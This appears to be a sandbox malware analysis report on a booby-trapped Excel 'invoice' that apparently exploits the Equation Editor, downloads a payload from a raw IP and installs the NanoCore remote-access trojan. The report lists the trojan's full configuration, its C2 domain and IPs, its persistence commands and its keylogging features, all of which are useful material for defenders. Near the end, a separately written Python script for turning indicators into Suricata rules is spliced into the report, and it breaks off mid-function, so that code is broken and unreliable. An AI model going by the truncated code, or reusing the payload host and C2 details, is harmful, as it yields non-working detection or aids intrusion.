
Windows Analysis Report INVOICE = 212888585 .xlsx

Overview

General Information

Sample Name: INVOICE = 212888585 .xlsx
Analysis ID: 483709
MD5: 145e00853b80fb2d97676c4416f984a9
SHA1: fa80c59ebbafc435e88ffdceae00450b56ec5d48
SHA256: e9c342550d334bffc58a310997673e24eed03f4d2b9c441dec943b24e7d29d08
Tags: xlsx
Detection

Nanocore
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Sigma detected: NanoCore
Yara detected AntiVM3
Detected Nanocore Rat
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: File Dropped By EQNEDT32EXE
Multi AV Scanner detection for dropped file
Yara detected Nanocore RAT
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Machine Learning detection for sample
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Office equation editor drops PE file
.NET source code contains very large strings
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Hides that the sample has been downloaded from the Internet (zone.identifier)
Uses schtasks.exe or at.exe to add and modify task schedules
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Potential document exploit detected (performs DNS queries)
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Installs a raw input device (often for capturing keystrokes)
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Detected TCP or UDP traffic on non-standard ports
Office Equation Editor has been started
Binary contains a suspicious time stamp
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 2584 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
  • EQNEDT32.EXE (PID: 832 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • ALP.exe (PID: 1272 cmdline: C:\Users\user\AppData\Roaming\ALP.exe MD5: 60E9F1E8596C98A6B07129D9C24EC359)
      • ALP.exe (PID: 1212 cmdline: C:\Users\user\AppData\Roaming\ALP.exe MD5: 60E9F1E8596C98A6B07129D9C24EC359)
        • schtasks.exe (PID: 2212 cmdline: 'schtasks.exe' /create /f /tn 'SMTP Service' /xml 'C:\Users\user\AppData\Local\Temp\tmp3811.tmp' MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
        • schtasks.exe (PID: 2596 cmdline: 'schtasks.exe' /create /f /tn 'SMTP Service Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp277F.tmp' MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
  • taskeng.exe (PID: 2612 cmdline: taskeng.exe {6D7D75E4-8EFD-44BB-96AC-FEA7E6E0852F} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1] MD5: 65EA57712340C09B1B0C427B4848AE05)
    • ALP.exe (PID: 2608 cmdline: C:\Users\user\AppData\Roaming\ALP.exe 0 MD5: 60E9F1E8596C98A6B07129D9C24EC359)
      • ALP.exe (PID: 2700 cmdline: C:\Users\user\AppData\Roaming\ALP.exe MD5: 60E9F1E8596C98A6B07129D9C24EC359)
    • smtpsvc.exe (PID: 2668 cmdline: 'C:\Program Files (x86)\SMTP Service\smtpsvc.exe' 0 MD5: 60E9F1E8596C98A6B07129D9C24EC359)
      • smtpsvc.exe (PID: 1412 cmdline: C:\Program Files (x86)\SMTP Service\smtpsvc.exe MD5: 60E9F1E8596C98A6B07129D9C24EC359)
      • smtpsvc.exe (PID: 2196 cmdline: C:\Program Files (x86)\SMTP Service\smtpsvc.exe MD5: 60E9F1E8596C98A6B07129D9C24EC359)
  • smtpsvc.exe (PID: 2796 cmdline: 'C:\Program Files (x86)\SMTP Service\smtpsvc.exe' MD5: 60E9F1E8596C98A6B07129D9C24EC359)
    • smtpsvc.exe (PID: 2192 cmdline: C:\Program Files (x86)\SMTP Service\smtpsvc.exe MD5: 60E9F1E8596C98A6B07129D9C24EC359)
    • smtpsvc.exe (PID: 344 cmdline: C:\Program Files (x86)\SMTP Service\smtpsvc.exe MD5: 60E9F1E8596C98A6B07129D9C24EC359)
  • cleanup

Malware Configuration

Threatname: NanoCore

{
  "Version": "1.2.2.0",
  "Mutex": "9ed8d108-2eb1-4e23-9679-783796e4",
  "Group": "Default",
  "Domain1": "godisgood1.hopto.org",
  "Domain2": "",
  "Port": 7712,
  "KeyboardLogging": "Enable",
  "RunOnStartup": "Enable",
  "RequestElevation": "Disable",
  "BypassUAC": "Enable",
  "ClearZoneIdentifier": "Enable",
  "ClearAccessControl": "Disable",
  "SetCriticalProcess": "Disable",
  "PreventSystemSleep": "Enable",
  "ActivateAwayMode": "Disable",
  "EnableDebugMode": "Disable",
  "RunDelay": 0,
  "ConnectDelay": 4000,
  "RestartDelay": 5000,
  "TimeoutInterval": 5000,
  "KeepAliveTimeout": 30000,
  "MutexTimeout": 5000,
  "LanTimeout": 2500,
  "WanTimeout": 8000,
  "BufferSize": "ffff0000",
  "MaxPacketSize": "0000a000",
  "GCThreshold": "0000a000",
  "UseCustomDNS": "Enable",
  "PrimaryDNSServer": "8.8.8.8",
  "BackupDNSServer": "8.8.4.4",
  "BypassUserAccountControlData": "<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.2\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo />\r\n  <Triggers />\r\n  <Principals>\r\n    <Principal id=\"Author\">\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>HighestAvailable</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>false</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <IdleSettings>\r\n      <StopOnIdleEnd>false</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>true</Enabled>\r\n    <Hidden>false</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n    <Priority>4</Priority>\r\n  </Settings>\r\n  <Actions Context=\"Author\">\r\n    <Exec>\r\n      <Command>\"#EXECUTABLEPATH\"</Command>\r\n      <Arguments>$(Arg0)</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task"
}

Yara Overview

Memory Dumps

Columns: Source, Rule, Description, Author, Strings

Source: 0000000E.00000002.523014987.00000000032D9000.00000004.00000001.sdmp
Rule: JoeSecurity_Nanocore; Description: Yara detected Nanocore RAT; Author: Joe Security

Source: 0000000E.00000002.523014987.00000000032D9000.00000004.00000001.sdmp
Rule: NanoCore; Description: unknown; Author: Kevin Breen <kevin@techanarchy.net>
  • 0x4312d:$a: NanoCore
  • 0x43186:$a: NanoCore
  • 0x431c3:$a: NanoCore
  • 0x4323c:$a: NanoCore
  • 0x568e7:$a: NanoCore
  • 0x568fc:$a: NanoCore
  • 0x56931:$a: NanoCore
  • 0x6f8c3:$a: NanoCore
  • 0x6f8d8:$a: NanoCore
  • 0x6f90d:$a: NanoCore
  • 0x4318f:$b: ClientPlugin
  • 0x431cc:$b: ClientPlugin
  • 0x43aca:$b: ClientPlugin
  • 0x43ad7:$b: ClientPlugin
  • 0x566a3:$b: ClientPlugin
  • 0x566be:$b: ClientPlugin
  • 0x566ee:$b: ClientPlugin
  • 0x56905:$b: ClientPlugin
  • 0x5693a:$b: ClientPlugin
  • 0x6f67f:$b: ClientPlugin
  • 0x6f69a:$b: ClientPlugin

Source: 00000004.00000002.691493356.00000000021B0000.00000004.00020000.sdmp
Rule: Nanocore_RAT_Gen_2; Description: Detetcs the Nanocore RAT; Author: Florian Roth
  • 0x350b:$x1: NanoCore.ClientPluginHost
  • 0x3525:$x2: IClientNetworkHost

Source: 00000004.00000002.691493356.00000000021B0000.00000004.00020000.sdmp
Rule: Nanocore_RAT_Feb18_1; Description: Detects Nanocore RAT; Author: Florian Roth
  • 0x350b:$x2: NanoCore.ClientPluginHost
  • 0x52b6:$s4: PipeCreated
  • 0x34f8:$s5: IClientLoggingHost

Source: 00000011.00000002.528139712.0000000002231000.00000004.00000001.sdmp
Rule: JoeSecurity_Nanocore; Description: Yara detected Nanocore RAT; Author: Joe Security

Unpacked PEs

Columns: Source, Rule, Description, Author, Strings

Source: 16.2.smtpsvc.exe.2564e04.2.raw.unpack
Rule: Nanocore_RAT_Gen_2; Description: Detetcs the Nanocore RAT; Author: Florian Roth
  • 0xe75:$x1: NanoCore.ClientPluginHost
  • 0xe8f:$x2: IClientNetworkHost

Source: 16.2.smtpsvc.exe.2564e04.2.raw.unpack
Rule: Nanocore_RAT_Feb18_1; Description: Detects Nanocore RAT; Author: Florian Roth
  • 0xe75:$x2: NanoCore.ClientPluginHost
  • 0x1261:$s3: PipeExists
  • 0x1136:$s4: PipeCreated
  • 0xeb0:$s5: IClientLoggingHost

Source: 16.2.smtpsvc.exe.358b34e.4.raw.unpack
Rule: Nanocore_RAT_Gen_2; Description: Detetcs the Nanocore RAT; Author: Florian Roth
  • 0xe75:$x1: NanoCore.ClientPluginHost
  • 0x145e3:$x1: NanoCore.ClientPluginHost
  • 0x2d5bf:$x1: NanoCore.ClientPluginHost
  • 0xe8f:$x2: IClientNetworkHost
  • 0x14610:$x2: IClientNetworkHost
  • 0x2d5ec:$x2: IClientNetworkHost

Source: 16.2.smtpsvc.exe.358b34e.4.raw.unpack
Rule: Nanocore_RAT_Feb18_1; Description: Detects Nanocore RAT; Author: Florian Roth
  • 0xe75:$x2: NanoCore.ClientPluginHost
  • 0x145e3:$x2: NanoCore.ClientPluginHost
  • 0x2d5bf:$x2: NanoCore.ClientPluginHost
  • 0x1261:$s3: PipeExists
  • 0x1136:$s4: PipeCreated
  • 0x156be:$s4: PipeCreated
  • 0x2e69a:$s4: PipeCreated
  • 0xeb0:$s5: IClientLoggingHost
  • 0x145fd:$s5: IClientLoggingHost
  • 0x2d5d9:$s5: IClientLoggingHost

Source: 16.2.smtpsvc.exe.358b34e.4.raw.unpack
Rule: JoeSecurity_Nanocore; Description: Yara detected Nanocore RAT; Author: Joe Security

Sigma Overview

AV Detection:

Sigma detected: NanoCore
Source: File created; Author: Joe Security; Data: EventID: 11, Image: C:\Users\user\AppData\Roaming\ALP.exe, ProcessId: 1212, TargetFilename: C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\run.dat

Exploits:

Sigma detected: EQNEDT32.EXE connecting to internet
Source: Network Connection; Author: Joe Security; Data: DestinationIp: 136.144.41.96, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 832, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
Sigma detected: File Dropped By EQNEDT32EXE
Source: File created; Author: Joe Security; Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 832, TargetFilename: C:\Users\user\AppData\Roaming\ALP.exe

E-Banking Fraud:

Sigma detected: NanoCore
Source: File created; Author: Joe Security; Data: same run.dat file-creation event (EventID 11, ProcessId 1212) as listed under AV Detection

System Summary:

Sigma detected: Droppers Exploiting CVE-2017-11882
Source: Process started; Author: Florian Roth; Data: Command: C:\Users\user\AppData\Roaming\ALP.exe, CommandLine: C:\Users\user\AppData\Roaming\ALP.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\ALP.exe, NewProcessName: C:\Users\user\AppData\Roaming\ALP.exe, OriginalFileName: C:\Users\user\AppData\Roaming\ALP.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 832, ProcessCommandLine: C:\Users\user\AppData\Roaming\ALP.exe, ProcessId: 1272

Stealing of Sensitive Information:

Sigma detected: NanoCore
Source: File created; Author: Joe Security; Data: same run.dat file-creation event (EventID 11, ProcessId 1212) as listed under AV Detection

Remote Access Functionality:

Sigma detected: NanoCore
Source: File created; Author: Joe Security; Data: same run.dat file-creation event (EventID 11, ProcessId 1212) as listed under AV Detection

Jbx Signature Overview

AV Detection:

Found malware configuration
Source: 0000000E.00000002.523014987.00000000032D9000.00000004.00000001.sdmp; Malware Configuration Extractor: NanoCore (the extracted configuration is the one listed in full under Malware Configuration above)
Multi AV Scanner detection for submitted file
Source: INVOICE = 212888585 .xlsx; Virustotal: Detection: 42%
Source: INVOICE = 212888585 .xlsx; ReversingLabs: Detection: 50%
Multi AV Scanner detection for dropped file
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe; ReversingLabs: Detection: 30%
Source: C:\Users\user\AppData\Roaming\ALP.exe; ReversingLabs: Detection: 30%
Yara detected Nanocore RAT
Source: Yara match; File source: 16.2.smtpsvc.exe.358b34e.4.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 4.2.ALP.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 14.2.ALP.exe.3320184.4.unpack, type: UNPACKEDPE
Source: Yara match; File source: 17.2.smtpsvc.exe.327b34e.4.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 16.2.smtpsvc.exe.3590184.3.unpack, type: UNPACKEDPE
Source: Yara match; File source: 10.2.ALP.exe.3318cc8.6.unpack, type: UNPACKEDPE
Source: Yara match; File source: 14.2.ALP.exe.33247ad.5.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 3.2.ALP.exe.34f8cc8.6.unpack, type: UNPACKEDPE
Source: Yara match; File source: 17.2.smtpsvc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 17.2.smtpsvc.exe.3280184.5.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 4.2.ALP.exe.6c0000.3.unpack, type: UNPACKEDPE
Source: Yara match; File source: 11.2.smtpsvc.exe.3338cc8.5.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 14.2.ALP.exe.3320184.4.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 16.2.smtpsvc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 16.2.smtpsvc.exe.3590184.3.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 4.2.ALP.exe.3480184.24.unpack, type: UNPACKEDPE
Source: Yara match; File source: 14.2.ALP.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 16.2.smtpsvc.exe.35947ad.5.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 17.2.smtpsvc.exe.32847ad.3.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 4.2.ALP.exe.34847ad.25.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 4.2.ALP.exe.6c0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 17.2.smtpsvc.exe.3280184.5.unpack, type: UNPACKEDPE
Source: Yara match; File source: 14.2.ALP.exe.331b34e.3.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 4.2.ALP.exe.6c4629.4.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 12.2.smtpsvc.exe.3298cc8.5.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 11.2.smtpsvc.exe.3338cc8.5.unpack, type: UNPACKEDPE
Source: Yara match; File source: 4.2.ALP.exe.347b34e.26.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 12.2.smtpsvc.exe.3298cc8.5.unpack, type: UNPACKEDPE
Source: Yara match; File source: 4.2.ALP.exe.3480184.24.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 3.2.ALP.exe.34f8cc8.6.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 10.2.ALP.exe.3318cc8.6.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0000000E.00000002.523014987.00000000032D9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000011.00000002.528139712.0000000002231000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0000000E.00000002.522978296.00000000022D1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000010.00000002.525259528.0000000003549000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000002.690682289.00000000006C0000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000010.00000002.525186411.0000000002541000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000002.690383308.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000011.00000002.528229678.0000000003239000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000002.694158728.0000000003479000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0000000A.00000002.511286759.0000000003289000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0000000E.00000002.522489862.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000011.00000002.527221961.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000010.00000002.524484369.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0000000C.00000002.516689891.0000000003209000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000002.691609233.0000000002431000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000003.00000002.479035033.0000000003469000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0000000B.00000002.513705045.00000000032A9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: ALP.exe PID: 1212, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: ALP.exe PID: 2700, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: smtpsvc.exe PID: 2196, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: smtpsvc.exe PID: 344, type: MEMORYSTR
Machine Learning detection for sample
Source: INVOICE = 212888585 .xlsx; Joe Sandbox ML: detected
Machine Learning detection for dropped file
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\ALP.exe; Joe Sandbox ML: detected
Source: 4.2.ALP.exe.400000.0.unpack; Avira: Label: TR/Dropper.Gen
Source: 17.2.smtpsvc.exe.400000.0.unpack; Avira: Label: TR/Dropper.Gen
Source: 4.2.ALP.exe.6c0000.3.unpack; Avira: Label: TR/NanoCore.fadte
Source: 16.2.smtpsvc.exe.400000.0.unpack; Avira: Label: TR/Dropper.Gen
Source: 14.2.ALP.exe.400000.0.unpack; Avira: Label: TR/Dropper.Gen

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; Process created: C:\Users\user\AppData\Roaming\ALP.exe
Source: unknown; Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\MyNanoCore RemoteScripting\MyClientPlugin\obj\Debug\MyClientPluginNew.pdb; source: ALP.exe, 00000004.00000002.690979593.0000000000820000.00000004.00020000.sdmp
Source: Binary string: C:\Users\Liam\Downloads\NanoCoreSwiss\MyClientPlugin\obj\Debug\MyClientPlugin.pdb; source: ALP.exe, 00000004.00000002.691649725.0000000002482000.00000004.00000001.sdmp
Source: Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\NanoCoreStressTester\NanoCoreStressTester\obj\Debug\NanoCoreStressTester.pdb; source: ALP.exe, 00000004.00000002.691649725.0000000002482000.00000004.00000001.sdmp
Source: Binary string: G:\Users\Andy\Documents\Visual Studio 2013\Projects\NanocoreBasicPlugin\NanoCoreBase\obj\Debug\NanoCoreBase.pdb; source: ALP.exe, 00000004.00000002.690948278.00000000007C0000.00000004.00020000.sdmp
Source: Binary string: P:\Visual Studio Projects\Projects 15\NanoNana\MyClientPlugin\obj\Debug\MyClientPlugin.pdb; source: ALP.exe, 00000004.00000002.691041233.00000000008A0000.00000004.00020000.sdmp
Source: Binary string: C:\Users\Cole\Documents\Visual Studio 2013\Projects\FileBrowserPlugin\FileBrowserClient\obj\Debug\FileBrowserClient.pdb; source: ALP.exe, 00000004.00000002.691649725.0000000002482000.00000004.00000001.sdmp
Source: global traffic; DNS query: name: godisgood1.hopto.org
Source: C:\Users\user\AppData\Roaming\ALP.exe; Code function: 4x nop then lea esp, dword ptr [ebp-08h]
Source: C:\Users\user\AppData\Roaming\ALP.exe; Code function: 4x nop then lea esp, dword ptr [ebp-04h]
Source: global traffic; TCP traffic: 192.168.2.22:49165 -> 136.144.41.96:80

        Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic; Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49166 -> 103.147.184.84:7712
Source: Traffic; Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49167 -> 103.147.184.84:7712
Source: Traffic; Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49168 -> 103.147.184.84:7712
Source: Traffic; Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49169 -> 103.147.184.84:7712
Source: Traffic; Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49170 -> 103.147.184.84:7712
Source: Traffic; Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49171 -> 103.147.184.84:7712
Source: Traffic; Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49172 -> 103.147.184.84:7712
Source: Traffic; Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49173 -> 103.147.184.84:7712
Source: Traffic; Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49174 -> 103.147.184.84:7712
Source: Traffic; Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49175 -> 103.147.184.84:7712
Source: Traffic; Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49176 -> 103.147.184.84:7712
Source: Traffic; Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49177 -> 103.147.184.84:7712
Source: Traffic; Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49178 -> 103.147.184.84:7712
Source: Traffic; Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49179 -> 103.147.184.84:7712
Source: Traffic; Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49180 -> 103.147.184.84:7712
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor; URLs: godisgood1.hopto.org
Source: Joe Sandbox View; ASN Name: VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN
Source: Joe Sandbox View; ASN Name: WORLDSTREAMNL
Source: global traffic; HTTP traffic detected: GET /HHK.exe HTTP/1.1 | Connection: Keep-Alive | Host: 136.144.41.96
Source: global traffic; HTTP traffic detected: HTTP/1.1 200 OK | Date: Wed, 15 Sep 2021 09:57:37 GMT | Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/8.0.9 | Last-Modified: Wed, 15 Sep 2021 03:07:30 GMT | ETag: "93400-5cbffffb6965c" | Accept-Ranges: bytes | Content-Length: 603136 | Keep-Alive: timeout=5, max=100 | Connection: Keep-Alive | Content-Type: application/x-msdownload | Data Raw: (hex dump of the response body omitted)
Source: global traffic; TCP traffic: 192.168.2.22:49166 -> 103.147.184.84:7712
Source: unknown; TCP traffic detected without corresponding DNS query: 136.144.41.96
        Source: unknownTCP traffic detected without corresponding DNS query: 136.144.41.96
        Source: unknownTCP traffic detected without corresponding DNS query: 136.144.41.96
        Source: unknownTCP traffic detected without corresponding DNS query: 136.144.41.96
        Source: unknownTCP traffic detected without corresponding DNS query: 136.144.41.96
        Source: unknownTCP traffic detected without corresponding DNS query: 136.144.41.96
        Source: unknownTCP traffic detected without corresponding DNS query: 136.144.41.96
        Source: unknownTCP traffic detected without corresponding DNS query: 136.144.41.96
        Source: unknownTCP traffic detected without corresponding DNS query: 136.144.41.96
        Source: unknownTCP traffic detected without corresponding DNS query: 136.144.41.96
        Source: unknownTCP traffic detected without corresponding DNS query: 136.144.41.96
        Source: ALP.exe, 00000004.00000002.691041233.00000000008A0000.00000004.00020000.sdmpString found in binary or memory: http://google.com
        Source: ALP.exe, 00000004.00000002.695025168.0000000005880000.00000002.00020000.sdmp, taskeng.exe, 00000009.00000002.690337039.0000000001C70000.00000002.00020000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
        Source: ALP.exe, 00000004.00000002.695025168.0000000005880000.00000002.00020000.sdmp, taskeng.exe, 00000009.00000002.690337039.0000000001C70000.00000002.00020000.sdmpString found in binary or memory: http://www.%s.comPA
        Source: unknownDNS traffic detected: queries for: godisgood1.hopto.org
        Source: global trafficHTTP traffic detected: GET /HHK.exe HTTP/1.1Connection: Keep-AliveHost: 136.144.41.96
        Source: ALP.exe, 00000004.00000002.690682289.00000000006C0000.00000004.00020000.sdmpBinary or memory string: RegisterRawInputDevices
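        The network observations above (a direct TCP connection to 103.147.184.84:7712, repeated connections to 136.144.41.96 with no preceding DNS lookup, a query for godisgood1.hopto.org and a GET for /HHK.exe) are the indicators a responder carries into detection. The Python below is an added example, not part of the Joe Sandbox report and not NanoCore code: it parses lines shaped like the report's network entries into structured IOCs and emits Suricata rules for them. The input lines are retyped here as constructed sample data; the rule syntax assumes Suricata 5 or later (dns.query, http.host and http.uri sticky buffers); rule messages and SIDs are placeholders to be replaced with your own allocation.

```python
"""Added example: turn sandbox network observations into IOCs and Suricata rules.

Not part of the Joe Sandbox report or of the malware; SAMPLE_LINES are
constructed to mirror the report's network entries.
"""
import ipaddress
import re
from collections import Counter

# Constructed input modelled on the report's network lines (retyped, not the
# report's own data file).
SAMPLE_LINES = [
    "Source: global traffic | TCP traffic: 192.168.2.22:49166 -> 103.147.184.84:7712",
    "Source: unknown | TCP traffic detected without corresponding DNS query: 136.144.41.96",
    "Source: unknown | TCP traffic detected without corresponding DNS query: 136.144.41.96",
    "Source: unknown | DNS traffic detected: queries for: godisgood1.hopto.org",
    "Source: global traffic | HTTP traffic detected: GET /HHK.exe HTTP/1.1 "
    "Connection: Keep-Alive Host: 136.144.41.96",
]

RE_TCP = re.compile(r"TCP traffic: (\S+):(\d+) -> (\S+):(\d+)")
RE_NODNS = re.compile(r"without corresponding DNS query: (\S+)")
RE_DNS = re.compile(r"queries for: (\S+)")
RE_HTTP = re.compile(r"HTTP traffic detected: (GET|POST) (\S+) HTTP/1\.[01].*?Host: (\S+)")


def extract_iocs(lines):
    """Return {'c2': [(ip, port)], 'no_dns_ips': Counter, 'domains': [...], 'urls': [...]}.

    Private destinations are ignored so sandbox-internal traffic never becomes an IOC.
    """
    iocs = {"c2": [], "no_dns_ips": Counter(), "domains": [], "urls": []}
    for line in lines:
        if m := RE_TCP.search(line):
            _src, _sport, dst, dport = m.groups()
            if not ipaddress.ip_address(dst).is_private:
                pair = (dst, int(dport))
                if pair not in iocs["c2"]:
                    iocs["c2"].append(pair)
        elif m := RE_NODNS.search(line):
            # Counted rather than deduplicated: the repeat count is itself a beaconing signal.
            iocs["no_dns_ips"][m.group(1)] += 1
        elif m := RE_DNS.search(line):
            dom = m.group(1).rstrip(".").lower()
            if dom not in iocs["domains"]:
                iocs["domains"].append(dom)
        elif m := RE_HTTP.search(line):
            _method, path, host = m.groups()
            url = f"http://{host}{path}"
            if url not in iocs["urls"]:
                iocs["urls"].append(url)
    return iocs


def to_suricata(iocs, base_sid=1000001):
    """Emit one Suricata rule per IOC (Suricata 5+ sticky-buffer syntax; SIDs are placeholders)."""
    rules, sid = [], base_sid
    for ip, port in iocs["c2"]:
        rules.append(
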